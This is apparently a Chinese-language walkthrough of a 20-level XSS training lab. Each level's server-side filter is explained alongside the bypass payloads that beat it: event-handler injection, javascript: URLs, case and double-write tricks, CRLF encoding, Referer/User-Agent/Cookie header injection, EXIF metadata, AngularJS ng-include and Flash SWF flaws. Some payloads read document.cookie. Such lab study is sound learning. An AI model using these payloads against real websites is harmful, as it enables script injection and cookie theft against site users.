1、第一关
比较简单,测试语句:
<svg/onload=alert(1)>
<script>confirm(1)</script>
<script>prompt(1)</script>
<script>alert(1)</script>
html页面简单的三种对话框如下:
|
2、第二关
此处为搜索型的xss,分析代码,使用的是get方法,从url中接受一个keyword搜索参数,此处用到了一个过滤函数htmlspecialchars(),这个函数把预定义的字符转换为HTML实体,“>”和“<”转义了,属于黑名单绕过,那就是不使用被过滤的符号,使用js的事件,如:" onmouseover=alert(2) >click。还需要注意的地方就是前面的符号闭合.
另一个payload:"><sript>alert(2)</script>,仍然是注意前面的闭合,就可以了。
3、第三关
这一关,过滤规则的更严格了,经过测试,“>”,“<”,“"”,被过滤了,但是单引号“'”,没有过滤,所以此处尝试js语句,“' onmouseover=alert(3)//”测试,后面无法闭合,所以使用了注释“//”。
4、第四关
研究一下源码,如下图,可以看到,传入进去的值经过了两个函数的参与,str_replace(">","",$str),此函数是将变量str中的字符>转换为空,转换时区分大小写;同样也把<转换为空,然后再经过函数的过滤转化,这时要在没有符号“<>”,的情况下构造语句,并且不被htmlspecialchars()函数影响。所以这里可以构造一个输入到文本框后出现相应的事件。
Payload:" onfocus=alert(4) autofocus="
"onlick=alert(4)//
onfocus事件:定义的事件将在对象获得焦点时触发,这里指input标签获得焦点。
autofocus属性:input标签的属性,当页面加载input标签,自动获得焦点。
焦点:这里指你的光标的位置,也就是说当你的光标出现在input文本框这里,将进行onfocus事件的发生。
5、第五关
看一下源代码,$str2=str_replace("<script","scr_ipt",$str),$str3=str_replace("on","o_n",$str2)是把<script转换为<scr_ipt,on转换成o_n,这样就过滤了js事件,$str=strtolower($_GET[''keyword"]);大小写绕过也会失效,不过这次没有过滤尖括号><。
这里用伪协议来构造payload:
"><iframe src=javascript:alert(5)>
"> <a href="jacascript:alert(5)">click me!!!</a>
"> <a href="javascript:%61lert(5)">click me !!!</a> //
6、第六关
经过查看源代码发现过滤了很多的字符,其中<script转换成<scr ipt,on转换成o_n,src转换成sr_c,data转换成da_ta,href转换成hr_ef,和上一关相比较这一关没有大小写的约束,于是可以变化大小写来绕过。
payload:
"> <SCRIpt>alert(6)</SCriPT>
"> <img Src=a ONerrOR=alert(6)>//
"> <a HrEf="javascript:alert(6)">click me!!!</a>//
"><svg x="" ONclick=alert(6)>
" ONclick=alert(6) //
7、第七关
根据代码显示,script,on,src,data,href都直接转换成空了,大小写也不能用了。所以尝试双写绕过。
payload:
"><scscriptript>alert(7)<sriscriptpt>
" oonnmouseover=alert(7)//
"><a hrhrefef=javascrscriptipt:alert(7)>CLICK ME !!!</a>//
8、第八关
分析代码可知,
"script"转换为"scr_ipt","on"转换为"o_n","src"转换为"sr_c","data"转换为"da_ta","href"转换为"hr_ef",'"'转换为'"',大小写过滤并被编码,尖括号><,单引号',%,#,&符号没有被过滤,输出点在a标签内,href属性中,属性里的双引号被转换成HTML实体,无法截断属性,这里可以使用伪协议绕过javascript:alert,由于script关键字被过滤,javascript会被替换成javasc_ript,使用r来代替r,伪协议后面可以使用URL编码进行编码。
Payload:
javascript:alert(8)
javascript:%61lert(8)
javascript:%61lert`1`
javascript:alert`1`
9、第九关
"script"转换为"scr_ipt","on"转换为"o_n","src"转换为"sr_c","data"转换为"da_ta","href"转换为"hr_ef",'"'转换为'"',和上一关差不多,不同的是多了自动检测URL,如果发现没有带http://内容则会显示为不合法。
payload:
javascript:alert(9)//http://a.com // 利用注释
javascript:%0dhttp://a.com%0dalert(9) // 不利用注释
javascript:%0ahttp://a.com%0dalert(9) // 不利用注释
10、第十关
分析代码,发现需要两个参数,一个是keyword,一个是t_sort,尖括号<>都被转换成空,还有三个hidden的隐藏输入框,或许可以从隐藏的输入框下手,构造payload。
payload:
keyword=test&t_sort="type="text" onclick="alert(10)
查看页面源码:
Keyword=aaa&t_sort=" type="text" onmouseover="alert(10)
Keyword=aaa&t_sort=" type="text" onmouseover=alert`1`
11、第十一关
分析代码,相比上一关,多了一个str11=$_SERVER['HTTP_REFERER'];验证的是http头部的xss注入,使用burp抓包,修改相应的字段,构造http头部referer的payload。
头部本身没有Referer,自行添加了,
payload:Referer:" onmouseover=alert(11) type="text"
Referer:" onclick="alert(11)" type="text
12、第十二关
查看代码,$str11=$_SERVER['HTTP_USER_AGENT'];应该是User-Agent的http头部注入,burp抓包,构造头部User-Agent的payload。
User-Agent:" onmouseover=alert(12) type="text"
User-Agent:" onclick="alert(12)" type="text
13、第十三关
查看代码,这次是cookie类型的xss注入,setcookie("user", "call me maybe?", time()+3600);
构造payload:
Cookie:" onmouseover=alert(13) type="text"
Cookie:" onclick="alert(13)" type="text
14、第十四关
这一关的图片一直加载不出来,所以也没有办法进行测试了。于是在网上找了一些参考,自己记录一下:
查看源码发现exif,猜测应该是exif xss,但是这个链接由于网络的原因无法访问,exif xss,一般利用于文件上传的地方,最经典的就是头像上传,上传一个图片,该图片的exif元数据被修改为xss payload,成功利用弹窗,具体实现使用kali下的exiftool工具,命令如下:
exiftool -FIELD=XSS FILE
exiftool -Artist=' "><img src=1 onerror=alert(document.domain)>' brute.jpeg
15、第十五关
查看代码,这一关是关于angular js的知识,ng-include有包含文件的意思,也就是相当于php里面的include,此处可以包含第一关的页面。
构造payload:
在url处写入语句,
src='level1.php?name=<img src=x onerror=alert(1)>'
如下图所示,这个没有利用成功,搜索到的另一个作者说是,因为这里需要访问angular.main.js这
个js文件,才能进行包含,虚拟机的环境中无法访问,看样子是需要fanqiang的,暂时无法实现,
最近国庆,抓的很严,我买的也挂掉了。。。
此处借用一张网上的成功图片吧。
2019/10/7更新:今天又弄了一个临时的vpn,紧接着就进行了测试,如下图显示,测试成功:
16、第十六关
查看代码发现大小写绕过失效,script、/、,等都被转换成 ,这时,可以尝试使用%0a,%0d来进行绕过。
构造语句:
Keyword=<img%0dsrc=a%0donerror=alert(16)>
Keyword=<iframe%0dsrc=0%0donmouseover=alert`16`></iframe>
Keyword=<svg%0aonload=alert`16`></svg>
17、第十七关
测试语句:
arg01=a&arg02=%20onmouseover=alert`1`
18、第十八关
这一关和上一关一样。
19、第十九关
Flash xss
页面源码,未插入语句时:
页面源码,插入语句后:
Payload:
192.168.40.129/xss/level19.php?arg01=version&arg02=<ahref="javascript:alert(document.domain)">xss_by_didi</a>
点击“xss_by_didi”就可以触发XSS。弹窗:
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
网上找了下大神的答案,这里记录一下:
flash xss,需要对flash的反编译对源码进行分析,这里使用jpexs-decompiler来分析,首先定位getURL函数
然后追踪到sIFR的内容
得知version参数可以传入loc4变量中,即sIFR的内容中,但是getURL只在内容为link时打开,所以分析contentIsLink函数
所以我们可以构造<a > </a> 标签来传值
http://localhost/xss_test/level19.php?arg01=version&arg02=<ahref="javascript:alert(1)">111111</a>
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
20、第二十关
额……这一关完全没有头绪呀。。。答案是网上搜来的,测试代码“\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//%26width%26height”
看着就好难。说是将swf下载下来分析得知是zeroclipboard.swf,有漏洞详情,因此构造出的payload就是上面的那句话,我就直接放进去测试一下成功率吧。
level20.php?arg01=a&arg02=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//%26width%26height
成功弹窗:
